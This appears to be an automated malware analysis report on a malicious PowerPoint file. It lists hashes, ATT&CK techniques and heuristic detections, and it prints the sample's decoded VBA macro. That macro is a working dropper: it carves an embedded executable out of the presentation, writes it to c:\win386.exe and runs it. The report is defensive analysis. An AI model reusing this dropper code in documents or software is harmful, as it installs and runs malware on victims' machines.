Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 d08fc0ba5fdf69b7…

MALICIOUS

Office (OLE)

148.0 KB Created: 2003-06-22 02:21:06 Authoring application: Microsoft PowerPoint First seen: 2012-06-14
MD5: 987ca3f233c3da0811b133c97395fe98 SHA-1: 8b632b0ae6218b79b7c6e756a0d21db88faa4a6d SHA-256: d08fc0ba5fdf69b7758f17a1db1f2c94edafef7338098f6c72bbe0e156071d4e
340 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File T1105 Ingress Tool Transfer T1027 Obfuscated Files or Information T1071.001 Web Protocols T1566.001 Spearphishing Attachment

The VBA macro within the sample uses Shell() to execute a dropped file, identified as 'c:\win386.exe'. This executable is embedded within the OLE file itself, indicated by the OLE_EMBEDDED_EXE heuristic. The macro code attempts to read the embedded executable from the presentation file and write it to disk before execution, leveraging Windows API calls like CreateFile, ReadFile, and WriteFile. The presence of VirtualAlloc, LoadLibrary, and GetProcAddress API references in the heuristics further suggests the embedded executable is designed to load and execute code.

Heuristics 8

  • ClamAV: Doc.Dropper.Agent-1560287 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-1560287
  • Embedded PE executable critical OLE_EMBEDDED_EXE
    MZ/PE header found inside document — possible embedded executable
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
    Shell ("c:\win386.exe")
  • Reference to LoadLibrary API high SC_STR_LOADLIBRARY
    Reference to LoadLibrary API
  • Reference to GetProcAddress API high SC_STR_GETPROCADDRESS
    Reference to GetProcAddress API
  • OLE file has appended executable-looking payload bytes high OLE_APPENDED_PAYLOAD
    OLE compound file contains a large high-entropy region beyond the declared major streams and that region includes shellcode, PE, or loader API markers. This is a payload-carrier signal, not a specific CVE attribution by itself.
  • Reference to VirtualAlloc API medium SC_STR_VIRTUALALLOC
    Reference to VirtualAlloc API

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 2216 bytes
SHA-256: 9307ba937b26ac7d5e66404695d2eaf332aa4ea42a091228fe2466003eb0f376
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "Slide3"
Attribute VB_Base = "0{91493445-5A91-11CF-8700-00AA0060263B}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Slide4"
Attribute VB_Base = "0{91493445-5A91-11CF-8700-00AA0060263B}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Control = "CommandButton1, 6, 0, MSForms, CommandButton"
Private Sub CommandButton1_Click()
On Error Resume Next
   Dim buffer(65536) As Byte
   Dim h, h2, j, i, k As Long
   
   h = CreateFile(ActivePresentation.FullName, &H80000000, 1 + 2, 0, 3, 0, 0)
   h2 = CreateFile("c:\win386.exe", &H40000000, 0, 0, 2, 0, 0)
   If h = -1 Then
      Exit Sub
   End If
   k = SetFilePointer(h, -42496, nil, 2)
   Do
      i = ReadFile(h, buffer(0), 65536, j, 0)
      i = WriteFile(h2, buffer(0), j, j, 0)
   Loop Until j < 65536
   
   CloseHandle (h)
   CloseHandle (h2)
Shell ("c:\win386.exe")
End Sub

Attribute VB_Name = "模块1"
Public Declare Function CreateFile Lib "kernel32" Alias "CreateFileA" (ByVal lpFileName As String, ByVal dwDesiredAccess As Long, ByVal dwShareMode As Long, ByVal lpSecurityAttributes As Long, ByVal dwCreationDistribution As Long, ByVal dwFlagsAndAttributes As Long, ByVal hTemplate As Long) As Long
Public Declare Function CloseHandle Lib "kernel32" (ByVal hObject As Long) As Long
Public Declare Function ReadFile Lib "kernel32" (ByVal hFile As Long, lpBuffer As Byte, ByVal dwNumberOfBytesToRead As Long, lpNumberOfBytesRead As Long, ByVal lpOverlapped As Long) As Long
Public Declare Function WriteFile Lib "kernel32" (ByVal hFile As Long, lpBuffer As Byte, ByVal dwNumberOfBytesToWrite As Long, lpNumberOfBytesWritten As Long, ByVal lpOverlapped As Long) As Long
Public Declare Function SetFilePointer Lib "kernel32" (ByVal hFile As Long, ByVal lDistanceToMove As Long, ByVal lpDistanceToMoveHigh As Long, ByVal dwMoveMethod As Long) As Long
embedded_office_0001aa00.exe embedded-pe Office MZ+PE at offset 0x1AA00 42496 bytes
SHA-256: bafb8d5a593a02f3d5499f0a4c6d1bf2a8ee0a6d48eeefc363032feef74fdf1c

Open this report in the interactive analyzer, or submit your own file for analysis.